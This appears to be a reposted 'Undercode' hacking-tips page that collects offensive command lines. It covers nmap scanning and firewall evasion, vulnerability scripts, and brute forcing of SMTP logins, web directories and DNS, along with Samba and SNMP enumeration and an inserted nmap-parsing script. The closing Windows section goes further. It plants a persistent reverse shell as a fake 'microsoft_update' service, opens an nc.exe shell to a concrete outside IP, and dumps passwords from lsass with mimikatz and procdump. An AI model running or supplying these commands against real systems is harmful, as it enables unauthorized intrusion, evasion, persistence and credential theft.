$ grep "open" FullTCP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "T:"$0}'
$ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "U:"$0}'
# Service version detection
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
# Operating system detection
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
# OS and service detection on selected ports
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
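The port-collection step above, as an added example that is not part of the original post: a shell function that turns `nmap -oN` reports into the `-p U:...,T:...` argument used by the final OS/service scan. It runs on constructed sample reports embedded in the script (no real scan is performed) and only counts lines whose STATE column is exactly `open`, so UDP `open|filtered` guesses are left out, which is stricter than a plain `grep "open"`.

```shell
#!/bin/sh
# Added example, not from the original post: turn `nmap -oN` reports into the
# -p U:...,T:... port list used for the final OS/service scan.
# The two reports below are constructed samples, not real scan output.

# open_ports FILE: unique port numbers whose STATE column is exactly "open",
# numerically sorted, one per line. "open|filtered" (common for UDP) is a
# guess, not a confirmed open port, so it is deliberately excluded.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { split($1, p, "/"); print p[1] }' "$1" \
        | sort -nu
}

# port_spec FILE LETTER: collapse the list into nmap syntax, e.g. T:22,80,443.
# Prints nothing (and still succeeds) when the report has no open ports.
port_spec() {
    ports=$(open_ports "$1" | paste -s -d ',' -)
    if [ -n "$ports" ]; then printf '%s:%s\n' "$2" "$ports"; fi
    return 0
}

# demo_port_spec: build the combined -p argument from two constructed reports.
demo_port_spec() {
    tcp=$(mktemp); udp=$(mktemp)
    cat > "$tcp" <<'EOF'
# Nmap 7.94 scan initiated (constructed sample)
Nmap scan report for 192.168.56.101
Host is up (0.00042s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
1234/tcp  filtered unknown
8080/tcp  open     http-proxy

Nmap scan report for 192.168.56.102
Host is up (0.00051s latency).
PORT      STATE    SERVICE
22/tcp    open     ssh
3306/tcp  open     mysql
EOF
    cat > "$udp" <<'EOF'
Nmap scan report for 192.168.56.101
PORT      STATE         SERVICE
53/udp    open          domain
111/udp   open          rpcbind
137/udp   open          netbios-ns
161/udp   open|filtered snmp
EOF
    spec="$(port_spec "$udp" U),$(port_spec "$tcp" T)"
    rm -f "$tcp" "$udp"
    printf '%s\n' "$spec"
}

# Prints U:53,111,137,T:22,80,139,445,3306,8080; on a real engagement feed it in as
#   nmap -O -sV -T4 -Pn -p "$(demo_port_spec)" -oG OS_Service_Detect -iL LiveHosts.txt
demo_port_spec
```

Port 1234 (filtered) and 161 (open|filtered) are dropped on purpose; if you want the UDP guesses included for version probing, widen the awk test to `$2 ~ /^open/`.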
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap Perform web vulnerability scanning
fb.com/undercodeTesting
> cd /usr/share/nmap/scripts/
> wget ...   # download nmap_nse_vulscan-2.0.tar.gz from the vulscan project (git or site)
> tar xzf nmap_nse_vulscan-2.0.tar.gz
> nmap -sS -sV --script=vulscan/vulscan.nse target
> nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
> nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
> nmap -Pn -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
> nmap -sV --script=vuln target
> nmap -Pn -sS -sV --script=all --script-args vulscancorrelation=1 target   # runs every NSE script, including intrusive ones: slow and noisy
π¦ Directory brute-forcing with DIRB
Note: DIRB is a tool dedicated to brute-forcing web directories and is installed by default in Kali. Similar tools include patator, dirsearch and DirBuster, and the Chinese tool Yujian (御剑).
> dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap β avoid firewall :
# Fragment packets
> $ nmap -f [target]
# Set a custom MTU; it must be a multiple of 8 (8, 16, 24, 32, ...)
> $ nmap --mtu 24 [target]
# Generate 10 random decoy addresses
> $ nmap -D RND:10 [target]
# Specify the decoy addresses manually
> $ nmap -D decoy1,decoy2,decoy3 [target]
# Idle (zombie) scan; first find a usable zombie host
> $ nmap -sI [zombie IP] [target IP]
# Use a specific source port
> $ nmap --source-port 80 [target]
# Append random data to every packet sent
> $ nmap --data-length 25 [target]
# Spoof the MAC address (a random address from the given vendor: Dell, Apple, 3Com, ...)
> $ nmap --spoof-mac Dell [target]
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦More Pratical hacking tips by undercode:
t.me/undercodeTesting
π¦ Patator β all-around brute force testing tool
# git clone https://github.com/lanjelot/patator.git /usr/share/patator
# SMTP login brute force
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
π¦ DNS brute-forcing with Fierce
Note: Fierce first checks whether the DNS server allows zone transfers; if so, it performs one and reports the result. If not, it enumerates host names by querying the DNS server with a wordlist. Similar tools: subDomainsBrute and SubBrute.
# https://ha.ckers.org/fierce/
$ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt
Scan web services with Nikto
nikto -C all -h https://IP
π¦WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url https: // IP / --enumerate p
π¦HTTP fingerprint recognition
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
Scan with Skipfish
Note: Skipfish is a web application security reconnaissance tool. It builds an interactive site map by recursively crawling the target and launching dictionary-based probes; the resulting map is then annotated with the output of a number of active security checks.
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
π¦Scan with nc
nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
π¦Unicornscan
Note: Unicornscan is a tool for information gathering and security auditing.
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
-H resolve host names during the report generation stage
-m scan mode (sf = TCP, U = UDP)
-Iv verbose output
Operating system fingerprinting with Xprobe2
xprobe2 -v -p tcp:80:open IP
π¦Enumerate Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
π¦Enumerate SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
Practical Windows cmd commands
net localgroup Users
net localgroup Administrators
dir /s *.doc (search for .doc files recursively)
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
32-bit system: C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
64-bit system: C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β